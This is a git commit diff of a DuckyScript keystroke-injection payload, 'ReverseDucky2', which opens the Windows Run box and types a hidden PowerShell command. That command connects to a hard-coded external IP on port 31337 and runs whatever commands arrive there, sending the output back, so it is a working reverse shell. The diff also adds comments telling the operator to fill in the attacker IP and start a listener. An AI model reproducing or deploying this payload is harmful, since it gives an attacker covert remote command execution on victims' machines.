This commit is contained in:
Aleksandr Sobolev 2024-08-22 10:34:13 +03:00
parent fc7e0f72ff
commit 5c745acc66

View File

@ -1,25 +1,34 @@
REM ReverseDucky2
REM Version 1.1
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Reverse shell executed in the background
REM Fill in Attacker-IP and Port in Line 19
REM DON'T FORGET TO START LISTENER
DELAY 1500 DELAY 1500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -NoP -NonI -W hidden STRING powershell -NoP -NonI -W Hidden -Command
DELAY 250 DELAY 250
ENTER ENTER
DELAY 200 DELAY 200
STRING $c=NewObject System.Net.Sockets.TCPClient("45.92.178.34", 31337);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$
STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
DELAY 100 DELAY 100
STRING s.Read($b,0,$b.Length))-ne 0){;$d=(NewObject -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$z=(ieX $d 2>&1|oU STRING $stream = $client.GetStream();
DELAY 100 DELAY 100
STRING t-String);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GetBytes($x);$s.Write($y,0,$y.Length);$s.Flush()};$c.Close() STRING [byte[]]$buffer = 0..65535|%{0};
DELAY 100
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
DELAY 100
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
DELAY 100
STRING $sendback = (iex $data 2>&1 | Out-String );
DELAY 100
STRING $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
DELAY 100
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
DELAY 100
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
DELAY 100
STRING $stream.Flush()
DELAY 100
STRING };
DELAY 100
STRING $client.Close()
DELAY 100 DELAY 100
ENTER ENTER